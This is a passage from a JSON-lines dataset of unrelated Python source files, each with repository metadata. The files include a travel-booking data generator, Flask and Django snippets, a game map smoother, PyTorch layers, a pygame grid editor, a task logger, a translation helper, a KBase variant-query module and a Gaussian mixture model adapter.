one_user_dict[\"country\"]\n\n if \"hotels\" in hotel_full_url: # set up so a user does not need to purchase both a hotel and car\n hoteljson = generate_user_hotel(hotel_full_url, priority, party_size)\n if (type(hoteljson) == dict) and (\"error\" not in hoteljson):\n initialized_dict[\"cartItems\"].append({})\n initialized_dict[\"cartItems\"][1][\"type\"] = \"Hotel\"\n cartItemsHotel_dict = initialized_dict[\"cartItems\"][1]\n cartItemsHotel_dict['uuid'] = hoteljson[\"id\"]\n cartItemsHotel_dict['description'] = \"description\"\n cartItemsHotel_dict[\"currency\"] = \"USD\"\n cartItemsHotel_dict['cost'] = hoteljson[\"cost\"]\n dateTo_hotel = car_full_url.split(\n \"&\")[-1].split(\"=\")[1].replace(\"-\", \" \")\n yearTo, monthTo, dayTo = dateTo_hotel.split(\" \")\n string = monthTo + \" \" + dayTo + \" \" + yearTo\n cartItemsHotel_dict[\"endDate\"] = string\n dateFrom_hotel = car_full_url.split(\n \"&\")[-2].split(\"=\")[1].replace(\"-\", \" \")\n yearFrom, monthFrom, dayFrom = dateFrom_hotel.split(\" \")\n string = monthFrom + \" \" + dayFrom + \" \" + yearFrom\n cartItemsHotel_dict[\"startDate\"] = string\n\n try:\n initialized_dict[\"totalAmount\"] += initialized_dict[\"cartItems\"][0][\"cost\"] + \\\n initialized_dict[\"cartItems\"][1][\"cost\"]\n # print(initialized_dict)\n return initialized_dict\n\n except:\n return \"Error\"\n return \"Error\"\n\n\ndef posting(params):\n 
# set dynamic environment var that is sent in\n base_url = 'http://localhost:9402' if \"CHECK_OUT_URL\" not in os.environ else os.environ[\"CHECK_OUT_URL\"]\n response = requests.post(base_url+'/api/v1/checkout/cart', json=params)\n\n # terminal with export CHECK_OUT_URL= http:// xxxxx. Default to local host port you are using if no envir variable\n # is provided\n\n\ndef main():\n counter = 0\n for _ in range(10000): # change back to 100\n total = 0\n for user in users:\n get = user.get\n willTravel = random.randint(0, 100)\n if willTravel > get(\"travel_frequency\"):\n continue\n # print((willTravel, get(\"travel_frequency\")))\n total = total + 1\n priority = user[\"priority\"]\n main_reason = user[\"main_reason_for_travel\"]\n reason = get_reason(main_reason)\n frequency = user[\"travel_frequency\"]\n income = user[\"income\"]\n\n randnum = random.randint(96, 192)\n carLoyal = get_carhotel_loyalty_status(\n priority, main_reason, frequency, randnum)\n hotelLoyal = get_carhotel_loyalty_status(\n priority, main_reason, frequency, randnum)\n flightLoyal = get_flight_loyalty_status(\n priority, main_reason, frequency, randnum)\n carFilter = {}\n flightFilter = {}\n hotelFilter = {}\n party_size = get_group_size(get(\"party_size\"))\n\n if carLoyal:\n carFilter[\"rental_company\"] = user[\"car_rental_loyalty\"]\n if priority != 'budget' and party_size > 4:\n carFilter[\"body_type\"] = \"suv\"\n # body_type, style\n\n if priority == \"budget\":\n carFilter[\"style\"] = \"basic\"\n elif priority == \"comfort\":\n carFilter[\"style\"] = \"premium\"\n else:\n carFilter[\"style\"] = \"luxury\"\n\n if hotelLoyal:\n hotelFilter = {\"superchain\": user[\"hotel_chain_loyalty\"]}\n\n if priority == \"budget\":\n hotelFilter[\"type\"] = \"budget\"\n elif priority == \"comfort\":\n hotelFilter[\"type\"] = \"comfort\"\n else:\n hotelFilter[\"type\"] = \"luxury\"\n\n if flightLoyal:\n flightFilter = {\"airlines\": user[\"airlines_loyalty\"]}\n\n destination = get_destination(\n get(\"frequently_visited_cities\"), destinations)\n offset = get_travel_day_offset(reason, priority)\n duration = get_travel_duration(reason, priority)\n dateFrom = datetime.date.today() + datetime.timedelta(days=offset)\n dateTo = dateFrom + datetime.timedelta(days=duration)\n\n hotelFilter[\"dateFrom\"] = str(dateFrom)\n hotelFilter[\"dateTo\"] = str(dateTo)\n\n carFilter[\"dateFrom\"] = str(dateFrom)\n carFilter[\"dateTo\"] = str(dateTo)\n\n path_params = \"/\" + \\\n kebab_case(destination[\"country\"]) + \\\n \"/\" + kebab_case(destination[\"city\"])\n\n hotel_full_url = hotel + path_params + query_gen(hotelFilter)\n # HOTEL_FULL_URL: http://localhost:9101/api/v1/hotels/romania/bucharest?superchain=Nimbus%20Elites&type=luxury&dateFrom=2020-07-29&dateTo=2020-07-31\n\n car_full_url = cars + path_params + query_gen(carFilter)\n # CAR_FULL_URL: http://localhost:9102/api/v1/cars/turkey/istanbul?rental_company=Capsule&style=luxury&dateFrom=2020-08-27&dateTo=2020-09-04\n postgres = format_postgres(\n user, hotel_full_url, car_full_url, priority, party_size)\n # POSTGRES SETS DATA INTO READABLE FORMAT FOR THE POSTGRES DATABASE\n posting(postgres)\n # POSTS TO POSTGRES DATABASE\n counter += 1\n if counter == 1:\n print(\"iteration: 1\")\n if counter % 100 == 0:\n print(\"iteration: \", counter)\n\n # date depending on reason -> 3 - 30 days for business, 20 - 60 for leisure\n###########################Generation################################################\n # business: 65% of time traveling 1-19 days in advanced,\n # ^^^5/9 of time 
is 1 person\n # so, 13% of time 20-30 days in advance with 1 person\n # 11% of time 20-30 days in advanced with 2-3 people\n # 5% of the time 20-30 days in advanced with 4 or more people\n # 6% of the time 30-60 days in advanced\n\n # leisure: 35% of time traveling 1-19 days in advanced\n #\n# Extra criteria for leisure:\n# if traveling more than 1 week then leisure\n#####################################################################################\n\n\n#########################Recommendation################################################\n # buisness:\n # --> will choose recommendation based on what most business people choose. Based on income >200000, will choose the fastest option for\n # for inbetween, randomly select OR choose middle priced options\n # flights and most expensive option for time/luxury.. For budget (<100000), choose least expensive recommendations\n\n # business tags for hotel/car:\n\n # more likely to be buisness if traveling with (1. leaving within 3-30 days in advance (2. also, 1 person\n # if traveling 1-19 days in advanced, 85% chance business.\n # unless income > 200,000, 90% chance of being time (time is a rich business man); select highest price\n # if traveling 20-30 days in advanced 60% chance business and 1 person\n # income > 200,000, 60% chance of being time (time is a rich business man)\n # elif traveling 20-30 days in advanced 40% chance business and 2-3 people\n # income > 200,000, still 40% chance of being time (time is a rich business man)\n # elif traveling 20-30 days in advanced 10% chance business and 4 or more people\n # income > 200,000, still 40% chance of being time (time is a rich business man)\n # if traveling 30-60 days in advanced, 15% chance of business\n\n # leisure:\n # --> will choose recommendation based on what most leisure people choose. Based on income >200000, will choose the luxury option\n # for inbetween, randomly select OR choose middle priced options\n # For budget (<100000), choose least expensive recommendations\n\n # more likely to be leisure if (1. leaving 20-60 days in advanced (2. also 2 people or more\n # if traveling 1-19 days in advance, 15% chance of being leisure. 
if also income > 200,000 then only 10% chance of leisure\n # if traveling 20-30 days in advance and 1 person, only 40% chance of being leisure\n # if traveling 20-30 days in advance and 2-3 people, 60% chance of being leisure\n # if traveling 20-30 days in advance and 4 or more people, 90% chance of being leisure\n # if traveling 30-60 days in advanced, 85% chance of leisure\n\n # time\n # leave also 7-14 days in advanced with high income > 200000: will select highest priced hotel within a 2 week timeline.\n # Will select the shortest duration flight, then most expensive\n # luxury\n # leave 30-60 days in\n # budget\n # will select cheapest\n\n # using same randnum for each selection\n # carRatio = (float(carloyal) / total) * 100.0\n # flightRatio = (float(flightloyal) / total) * 100.0\n\n # print(\"Car Ratio: \", carRatio)\n # print(\"Flight Ratio: \", flightRatio)\n # print()\n\nmain()\n\n# for time look at the income for the type they are looking at\n\n##############Loyalty Rules#####################\n# hotel and car\n# priority:\n# comfort\n# least frequent (baseline): 0.45\n# luxury\n# least frequent (baseline): 0.4\n# time\n# least frequent (baseline): 0.35\n# budget\n# least frequent (baseline): 0.3\n# frequency weight: 2x, 1.5x, 1x\n\n# comfort = 8\n# luxury = 6\n# time = 5\n# budget = 4\n\n# frequent = 8\n# moderate = 6\n# infrequet = 4\n\n# business = 8\n# leisure = 6\n# family = 4\n\n# 256\n# 64\n\n# randomnum\n# the highest range 72 and lowest is 18, so 36 is inbetween for a scorecomparison\n\n# -----------------------------------------------------------\n# flight\n# priority:\n# comfort\n# least frequent (baseline): 0.45\n# luxury\n# least frequent (baseline): 0.4\n# time\n# least frequent (baseline): 0.15\n# budget\n# least frequent (baseline): 0.3\n# frequency weight: 2x, 1.5x, 1.5x, 1x\n\n# threshold, random number to compare with threshold\n","repo_name":"bee-travels/data-generator","sub_path":"src/transactions/transaction_data_gen.py","file_name":"transaction_data_gen.py","file_ext":"py","file_size_in_byte":22702,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"16386722546","text":"from myPackage.models import Student, Subject\nfrom myPackage.models import db\n\ndef create_subjects_for_student(name, subject_names):\n # Check if student already exists\n student = Student.query.filter_by(name=name).first()\n if not student:\n # Create new student\n student = Student(name=name)\n db.session.add(student)\n db.session.commit()\n\n # Create subjects for student\n for subject_name in subject_names:\n subject = Subject.query.filter_by(name=subject_name).first()\n if not subject:\n subject = Subject(name=subject_name)\n db.session.add(subject)\n db.session.commit()\n student.subjects.append(subject)\n db.session.commit()\n\ncreate_subjects_for_student('John', ['Math', 'Science', 'History'])\nstudent = Student.query.filter_by(name='John').first()\nfor subject in student.subjects:\n print(subject.name)\n","repo_name":"MahmoudAbuelhasaan/Flask-laps","sub_path":"add_student_subject.py","file_name":"add_student_subject.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21030197768","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.signal import savgol_filter\nfrom scipy.ndimage import gaussian_filter\n\nMAPSIZE = 4096\n\ndef 
process_map(mapfile):\n MAPSIZE = 4096\n maxbytes = MAPSIZE*MAPSIZE\n with open(mapfile, 'rb') as f:\n data = f.read()\n start = 1024\n row = []\n mapdata = np.ndarray(shape=(MAPSIZE, MAPSIZE), dtype=int)\n tiledata = np.ndarray(shape=(MAPSIZE, MAPSIZE), dtype=int)\n print(\"Created empty mapdata\")\n for i in range(0,MAPSIZE*MAPSIZE):\n x = i % MAPSIZE\n y = int(i / MAPSIZE)\n part = data[start+i*4 : start+4+(i*4)]\n tile = int.from_bytes(part[0:2], signed=True)\n height = int.from_bytes(part[2:4], signed=True)\n tiledata[x,y] = tile\n mapdata[x,y] = height\n return mapdata, tiledata\n\ndef get_preamble(mapfile):\n with open(mapfile, 'rb') as f:\n data = f.read()\n return data[0:1024]\n\ndef smooth_map(mapdata):\n sigma = [0.8, 0.8]\n smoothdata = gaussian_filter(mapdata, sigma)\n return smoothdata\n\ndef write_map(mapdata, tiledata, preamble, outfile):\n with open(outfile, 'wb') as f:\n f.write(preamble)\n for y in range(0,MAPSIZE):\n print(f'\\r{y+1}/{MAPSIZE}', end='')\n for x in range(0,MAPSIZE):\n tile = int(tiledata[x,y])\n height = int(mapdata[x,y])\n tilebytes = tile.to_bytes(2, 'big', signed=True)\n heightbytes = height.to_bytes(2, 'big', signed=True)\n f.write(tilebytes + heightbytes)\n print()\n\nif __name__ == \"__main__\":\n mapfile1 = sys.argv[1]\n mapfile2 = sys.argv[2]\n preamble = get_preamble(mapfile1)\n mapdata1, tiledata1 = process_map(mapfile1)\n smoothmap1 = smooth_map(mapdata1)\n output1 = write_map(smoothmap1, tiledata1, preamble, \"output/rock_layer.map\")\n mapdata2, tiledata2 = process_map(mapfile2)\n smoothmap2 = smooth_map(mapdata2)\n output2 = write_map(smoothmap2, tiledata2, preamble, \"output/top_layer.map\")\n","repo_name":"kraetzin/wurm-map-smoother","sub_path":"map_smoother/map_smoother.py","file_name":"map_smoother.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37167206576","text":"from django.http import UnreadablePostError\nfrom pylibmc import Error as MemcachedError\n\nEXCLUDED = (\n UnreadablePostError,\n MemcachedError,\n)\n\ndef exclude_useless_errors(record):\n if record.exc_info:\n exc_type, exc_value = record.exc_info[:2]\n for excluded_class in EXCLUDED:\n if isinstance(exc_value, excluded_class):\n return False\n return True\n","repo_name":"henrysher/fedora-infra-ansible","sub_path":"roles/mailman/files/django_fedora.py","file_name":"django_fedora.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"44"} +{"seq_id":"33230905368","text":"# Code adapted from: https://github.com/hmsandager/Normalizing-flow-and-deep-kalman-filter/blob/main/dkf.py\nfrom typing import Tuple\nimport torch\nimport torch.nn as nn\nfrom torchtyping import TensorType\n\nscale_clamper = 1e-4\n\n\nclass LinearCombiner(nn.Module):\n \"\"\"\n Parameterizes `q(z_t | z_{t-1}, x_{t:T})`, which is the basic building block\n of the guide (i.e. the variational distribution). 
The dependence on `x_{:t}` is\n through the hidden state of the RNN (see the PyTorch module `rnn` below)\n\n Args:\n z_dim (int): num of dims for the latent variable, z\n rnn_dim (int): num of dims for the hidden rnn state from the input vector, x\n \"\"\"\n\n def __init__(self, z_dim: int, rnn_dim: int) -> None:\n super().__init__()\n # initialize the three linear transformations used in the neural network\n self.lin_z_to_hidden = nn.Linear(z_dim, rnn_dim)\n self.lin_hidden_to_loc = nn.Linear(rnn_dim, z_dim)\n self.lin_hidden_to_scale = nn.Linear(rnn_dim, z_dim)\n # initialize the two non-linearities used in the neural network\n self.tanh = nn.Tanh()\n self.softplus = nn.Softplus()\n\n def forward(\n self,\n z_t_1: TensorType[\"batch\", \"latent_dim\"],\n h_rnn: TensorType[\"batch\", \"hidden_dim\"],\n ) -> Tuple[TensorType[\"batch\", \"latent_dim\"], TensorType[\"batch\", \"latent_dim\"]]:\n \"\"\"\n Given the latent z at at a particular time step t-1 as well as the hidden\n state of the RNN `h(x_{:t})` we return the mean and scale vectors that\n parameterize the (diagonal) gaussian distribution `q(z_t | z_{t-1}, x_{:t})`\n\n Args:\n z_t_1 (tensor): latent variable input, (B, D_z)\n h_rnn (tensor): rnn latent variable input, (B, D_h)\n\n Returns:\n loc: output mean for transition function, size=(B, D_z)\n scale: output scale for the transition function, size=(B, D_z)\n \"\"\"\n # combine the rnn hidden state with a transformed version of z_t_1\n h_combined = 0.5 * (self.tanh(self.lin_z_to_hidden(z_t_1)) + h_rnn)\n # use the combined hidden state to compute the mean used to sample z_t\n loc = self.lin_hidden_to_loc(h_combined)\n # use the combined hidden state to compute the scale used to sample z_t\n scale = self.softplus(self.lin_hidden_to_scale(h_combined))\n # return loc, scale which can be fed into Normal\n return loc, scale\n\n\nclass Flattener(nn.Module):\n \"\"\"\n Flatten the input data\n \"\"\"\n\n def __init__(\n self,\n width: int,\n height: int,\n input_channels: int,\n rnn_dim: int,\n flatten_channels: int,\n kernel_size: int,\n ):\n super().__init__()\n padding = int((kernel_size - 1) / 2)\n stride = 2\n self.input_width = width // 2 ** len(flatten_channels)\n self.input_height = height // 2 ** len(flatten_channels)\n self.input_dim = flatten_channels[-1] * self.input_width * self.input_height\n\n # Two-layered convolution with a fully connected layer at last\n self.cnn_to_hidden = nn.Conv2d(\n input_channels, flatten_channels[0], kernel_size, stride, padding, bias=True\n )\n self.cnn_hidden_to_hidden = nn.Conv2d(\n flatten_channels[0],\n flatten_channels[1],\n kernel_size,\n stride,\n padding,\n bias=True,\n )\n self.lin_hidden_to_rnn = nn.Linear(self.input_dim, rnn_dim)\n\n # Non-linearities\n self.relu = nn.ReLU()\n self.softplus = nn.Softplus()\n self.tanh = nn.Tanh()\n\n def forward(\n self, z_t: TensorType[\"batch\", \"n_channels\", \"height\", \"width\"]\n ) -> TensorType[\"batch\", \"hidden_dims\"]:\n \"\"\"\n Return the flattened input to RNN\n \"\"\"\n batch_size = z_t.shape[0]\n h1 = self.relu(self.cnn_to_hidden(z_t))\n h2 = self.relu(self.cnn_hidden_to_hidden(h1)).view(batch_size, -1)\n rnn_input = self.tanh(self.lin_hidden_to_rnn(h2))\n\n return rnn_input\n\n\nclass ConvLSTMCombiner(nn.Module):\n \"\"\"\n Parameterizes `q(z_t | z_{t-1}, x_{t:T})`, which is the basic building block\n of the guide (i.e. the variational distribution). 
The dependence on `x_{t:T}` is\n through the hidden state of the RNN (see the PyTorch module `rnn` below)\n \"\"\"\n\n def __init__(self, z_channels, rnn_channels, kernel_size):\n super().__init__()\n padding = int((kernel_size - 1) / 2)\n stride = 1\n\n # initialize the three linear transformations used in the neural network\n self.lin_z_to_hidden = nn.Conv2d(\n z_channels, rnn_channels, kernel_size, stride, padding, bias=True\n )\n self.lin_hidden_to_loc = nn.Conv2d(\n rnn_channels, z_channels, kernel_size, stride, padding, bias=True\n )\n self.lin_hidden_to_scale = nn.Conv2d(\n rnn_channels, z_channels, kernel_size, stride, padding, bias=True\n )\n # initialize the two non-linearities used in the neural network\n self.tanh = nn.Tanh()\n self.softplus = nn.Softplus()\n\n def forward(self, z_t_1, h_rnn):\n \"\"\"\n Given the latent z at at a particular time step t-1 as well as the hidden\n state of the RNN `h(x_{t:T})` we return the mean and scale vectors that\n parameterize the (diagonal) gaussian distribution `q(z_t | z_{t-1}, x_{t:T})`\n \"\"\"\n # combine the rnn hidden state with a transformed version of z_t_1\n h_combined = 0.5 * (self.tanh(self.lin_z_to_hidden(z_t_1)) + h_rnn)\n # use the combined hidden state to compute the mean used to sample z_t\n loc = self.lin_hidden_to_loc(h_combined)\n # use the combined hidden state to compute the scale used to sample z_t\n scale = self.softplus(self.lin_hidden_to_scale(h_combined)).clamp(\n min=scale_clamper\n )\n # return loc, scale which can be fed into Normal\n return loc, scale\n","repo_name":"jejjohnson/research_notebook","sub_path":"code/torch/lib/filter/models/layers/combiner.py","file_name":"combiner.py","file_ext":"py","file_size_in_byte":6016,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"44"} +{"seq_id":"40775311558","text":"import pygame\nfrom numpy import *\nfrom math import sqrt as s\n\ninp = [1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1]\n\npygame.init()\n\nscreen = pygame.display.set_mode((200, 200), flags=pygame.RESIZABLE)\npygame.display.set_caption('Mars protection')\nwidth, height = pygame.display.get_surface().get_size()\n\nsqr_size = int(height / 3)\nsqrs = 5*3\n\npath = ''\n\nsquare = (\n [pygame.image.load(path + 'images/images/square.png')] * sqrs\n)\n\nsquare_white = pygame.transform.scale(pygame.image.load(path + 'images/images/square.png').convert_alpha(),\n (sqr_size, sqr_size))\nsquare_black = pygame.transform.scale(pygame.image.load(path + 'images/images/square_black.png').convert_alpha(),\n (sqr_size, sqr_size))\n\nsquare_rect = []\n\nlist_sqr = inp\nrighting = False\n\nrunning = True\nwhile running:\n\n screen.fill('gray')\n\n if height > 500:\n screen = pygame.display.set_mode((width, 500), flags=pygame.RESIZABLE)\n square_rect = []\n width, height = pygame.display.get_surface().get_size()\n sqr_size = int(height / 7)\n\n square_white = pygame.transform.scale(pygame.image.load(path + 'images/images/square.png').convert_alpha(),\n (sqr_size, sqr_size))\n square_black = pygame.transform.scale(pygame.image.load(path + 'images/images/square_black.png').convert_alpha(),\n (sqr_size, sqr_size))\n\n mouse = pygame.mouse.get_pos()\n keys = pygame.key.get_pressed()\n\n for i in range(len(square)):\n if inp[i] == 1:\n square[i] = square_black\n else:\n square[i] = square_white\n\n x = (width - (sqr_size * 3)) / 2 - sqr_size\n y = sqr_size\n for quantity in range(len(inp) + 1):\n for high in range(int(5)):\n if quantity == high * 3 + 1 and high != 0:\n y += sqr_size\n x 
= (width - (sqr_size * 3)) / 2\n if quantity != 0:\n screen.blit(pygame.transform.scale(square[quantity - 1].convert_alpha(), (sqr_size, sqr_size)), (x, y))\n square_rect.append(square[quantity - 1].get_rect(topleft=(x, y)))\n x += sqr_size\n\n if righting:\n for squares in range(len(square)):\n mouse = pygame.mouse.get_pos()\n keys = pygame.key.get_pressed()\n if square_rect[squares].collidepoint(mouse) and pygame.mouse.get_pressed()[0]:\n square[squares] = square_black\n list_sqr[squares] = 1\n else:\n for squares in range(len(square)):\n mouse = pygame.mouse.get_pos()\n keys = pygame.key.get_pressed()\n if square_rect[squares].collidepoint(mouse) and pygame.mouse.get_pressed()[0]:\n square[squares] = square_white\n list_sqr[squares] = 0\n\n pygame.display.update()\n\n keys = pygame.key.get_pressed()\n for event in pygame.event.get():\n if keys[pygame.K_r]:\n righting = True\n if keys[pygame.K_l]:\n righting = False\n if event.type == pygame.QUIT or keys[pygame.K_ESCAPE]:\n running = False\n print(list_sqr)\n pygame.quit()\n","repo_name":"Vlad21islav/neiroNumber","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20993164450","text":"import csv\nimport os.path\nfrom prompt import Prompt\nimport datetime\n\n\nclass Entry(Prompt):\n\n def save(self, new_content):\n # Check if CSV file exists - if not create a new file and write headers\n file_exists = os.path.isfile('logfile.csv')\n with open('logfile.csv', 'a') as csvfile:\n if not file_exists:\n fieldnames = ['Date', 'Task Name', 'Time Spent', 'Notes']\n dict_writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n dict_writer.writeheader()\n writer = csv.writer(csvfile, delimiter=',')\n for entry in new_content:\n writer.writerow(entry)\n\n def get_content(self):\n content = []\n self.prompt(\"\"\"Please enter the date of the task.\n Please use DD/MM/YYYY: \"\"\")\n user_input = input()\n self.clear()\n try:\n task_date = datetime.datetime.strptime(user_input, \"%d/%m/%Y\").date()\n content.append(task_date.strftime('%m/%d/%Y'))\n except ValueError:\n print('That does not seem to be a valid date. Try again.')\n\n self.prompt('Please enter the title of the task. ')\n task_title = input()\n content.append(task_title)\n self.clear()\n\n self.prompt('Time spent (rounded minutes): ')\n time_spent = input()\n content.append(time_spent)\n self.clear()\n\n self.prompt('Notes (optional): ')\n notes = input()\n content.append(notes)\n self.clear()\n\n self.save([content])\n self.prompt('Your entry has been added. 
Press any key to return to the main menu.')\n input()\n self.clear()\n","repo_name":"maxlvl/techdegree-project-3","sub_path":"entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31613209307","text":"from google.cloud import translate\nimport os \n\ndef translate_text(text: str, target_language_code: str) -> translate.Translation:\n client = translate.TranslationServiceClient()\n\n response = client.translate_text(\n parent='projects/' + os.environ['PROJECT_ID'],\n contents=[text],\n target_language_code=target_language_code,\n )\n\n return response.translations[0].translated_text\n\n\nif __name__ == \"__main__\":\n from dotenv import load_dotenv\n load_dotenv()\n print(translate_text('Isso é um teste', 'en'))","repo_name":"vinicius-marques1/gen_ai_teste","sub_path":"traduzir.py","file_name":"traduzir.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3295643695","text":"# -*- coding: utf-8 -*-\n#BEGIN_HEADER\nimport logging\nimport os\nimport uuid\nfrom VariationDataQuery.Utils.vcf_parser import vcf_parser\nfrom VariationDataQuery.Utils.htmlreportutils import htmlreportutils\nfrom installed_clients.KBaseReportClient import KBaseReport\n\n#END_HEADER\n\n\nclass VariationDataQuery:\n '''\n Module Name:\n VariationDataQuery\n\n Module Description:\n A KBase module: VariationDataQuery\n '''\n\n ######## WARNING FOR GEVENT USERS ####### noqa\n # Since asynchronous IO can lead to methods - even the same method -\n # interrupting each other, you must be *very* careful when using global\n # state. A method could easily clobber the state set by another while\n # the latter method is running.\n ######################################### noqa\n VERSION = \"0.0.1\"\n GIT_URL = \"\"\n GIT_COMMIT_HASH = \"\"\n\n #BEGIN_CLASS_HEADER\n #END_CLASS_HEADER\n\n # config contains contents of config file in a hash or None if it couldn't\n # be found\n def __init__(self, config):\n #BEGIN_CONSTRUCTOR\n self.callback_url = os.environ['SDK_CALLBACK_URL']\n self.shared_folder = config['scratch']\n logging.basicConfig(format='%(created)s %(levelname)s: %(message)s',\n level=logging.INFO)\n self.vp = vcf_parser() \n self.hr = htmlreportutils()\n #END_CONSTRUCTOR\n pass\n\n\n def run_VariationDataQuery(self, ctx, params):\n \"\"\"\n This example function accepts any number of parameters and returns results in a KBaseReport\n :param params: instance of mapping from String to unspecified object\n :returns: instance of type \"ReportResults\" -> structure: parameter\n \"report_name\" of String, parameter \"report_ref\" of String\n \"\"\"\n # ctx is the context object\n # return variables are: output\n #BEGIN run_VariationDataQuery\n\n self.vp.validate_params(params)\n outputdir = self.shared_folder + '/' + str(uuid.uuid1())\n os.mkdir(outputdir)\n workspace = params['workspace_name']\n coordinates = params['coordinates']\n\n id = 0\n\n coord_array = coordinates.split(\",\")\n for coord in coord_array:\n contig_id,start,stop = coord.split(\"-\")\n print(contig_id + \"\\t\" + str(start) + \"\\t\" + str(stop))\n sample_info_file = os.path.join(self.shared_folder, \"sample_names\" + str(id) + \".txt\")\n variants_info_file = os.path.join(self.shared_folder, \"data\" + str(id) + \".txt\")\n self.vp.get_variants( contig_id, str(start), str(stop), 
\"https://appdev.kbase.us/dynserv/b8fedfd6d8a1fc10372bcbad4f152b4b6d85507b.VariationFileServ/shock/a293a557-47b3-4fcc-8bef-d2049ad6368a\", \"https://appdev.kbase.us/dynserv/b8fedfd6d8a1fc10372bcbad4f152b4b6d85507b.VariationFileServ/shock/f19936ff-6f66-4a44-831f-1bfcdc6e88c4\", id)\n variant_file = self.vp.getjson(sample_info_file, variants_info_file, outputdir, id)\n id = id + 1\n\n output = self.hr.create_html_report(self.callback_url, outputdir, workspace)\n \n report = KBaseReport(self.callback_url)\n\n #END run_VariationDataQuery\n\n # At some point might do deeper type checking...\n if not isinstance(output, dict):\n raise ValueError('Method run_VariationDataQuery return value ' +\n 'output is not type dict as required.')\n # return the results\n return [output]\n def status(self, ctx):\n #BEGIN_STATUS\n returnVal = {'state': \"OK\",\n 'message': \"\",\n 'version': self.VERSION,\n 'git_url': self.GIT_URL,\n 'git_commit_hash': self.GIT_COMMIT_HASH}\n #END_STATUS\n return [returnVal]\n","repo_name":"kbasecollaborations/VariationDataQuery","sub_path":"lib/VariationDataQuery/VariationDataQueryImpl.py","file_name":"VariationDataQueryImpl.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5405063860","text":"from sklearn.mixture import GaussianMixture\nfrom sklearn.cluster import KMeans, MiniBatchKMeans\nimport scipy.stats as stats\nimport numpy as np\n\n\nclass GaussianMixtureModel:\n\n def __init__(self, num_of_components=32):\n self.num_of_gaussian_component = num_of_components\n\n # According to research, GMM in speaker recognition\n # work best with diagonal covariance matrix\n self.gmm_model = GaussianMixture(n_components=num_of_components,\n covariance_type=\"diag\")\n\n def fit(self, data):\n # Use K-Mean to estimate GMM component centers\n # kmeans = KMeans(n_clusters=self.num_of_gaussian_component)\n kmeans = MiniBatchKMeans(n_clusters=self.num_of_gaussian_component)\n kmeans.fit(data)\n\n self.gmm_model.means_init = kmeans.cluster_centers_\n\n # Fit data\n self.gmm_model.fit(data)\n\n def adapt(self, data):\n \"\"\"\n Adapting Gaussian components to a specific speaker's data. Use for UBM model\n\n Ref: Speaker Verification Using Adapted Gaussian Mixture Models - D. A. 
Reynolds et al.\n \"\"\"\n\n # NOTE: Self-convention: L stand for list, D stand for dict, w stand for weighted\n # Key: i - index of component; Value: probability density of each data point with component i\n print(\"Start adapting GMM to data size %s\", str(data.shape))\n T = len(data) # number of data point\n M = len(self.gmm_model.means_) # number of Gaussian components\n\n print(\"Start calculating pdf of %d components with %d data points\", M, T)\n\n pD = np.transpose(self.gmm_model.predict_proba(data)) # Shape: n_components, n_sameple\n\n\n # pD = dict()\n # for i in range(M):\n # mu = self.gmm_model.means_[i]\n # cov = self.gmm_model.covariances_[i]\n #\n # pD[i] = list()\n #\n # for xt in data:\n # # pD[i][t] = gauss_pdf of component i with data point xt\n # pxt = stats.multivariate_normal.pdf(xt, mu, cov)\n # pD[i].append(pxt)\n #\n # logger.debug(\"Finish component %d\", i)\n\n # Weighted probability density of each data point\n # wpL[t] = pdf of GMM with data point xt\n\n print(\"Start calculating weight pdf of %d data points\", T)\n wpL = list()\n for t, xt in enumerate(data):\n\n prob_sum = 0\n for i in range(M):\n prob_sum += pD[i][t] * self.gmm_model.weights_[i]\n\n wpL.append(prob_sum)\n\n # Normalized pdf of component i with data point xt\n # Correspond with formula 7 in the article\n # prD[i][t]= (w_i * p_i(t) / sum (w_j * p_j(t)))\n prD = dict()\n\n print(\"Start normalize weight pdf of %d components with %d data points\", M, T)\n for i in range(M):\n wi = self.gmm_model.weights_[i]\n prD[i] = list()\n\n for t, xt in enumerate(data):\n prD[i].append(pD[i][t] * wi / wpL[t])\n\n nL = dict()\n eL = dict()\n e2L = dict()\n wL_ = list()\n\n for i in range(M):\n print(\"Start adapting parameters of GMM component %d\", i)\n mui = self.gmm_model.means_[i]\n cov = np.diag(self.gmm_model.covariances_[i]) # because GMM store covariance matrix as diagonal vector\n wi = self.gmm_model.weights_[i]\n\n nL[i] = sum(prD[i])\n # in case the total sum of probability too small\n # skip adapting this component\n if nL[i] == 0:\n logger.warn(\"Total sum of probability = 0. 
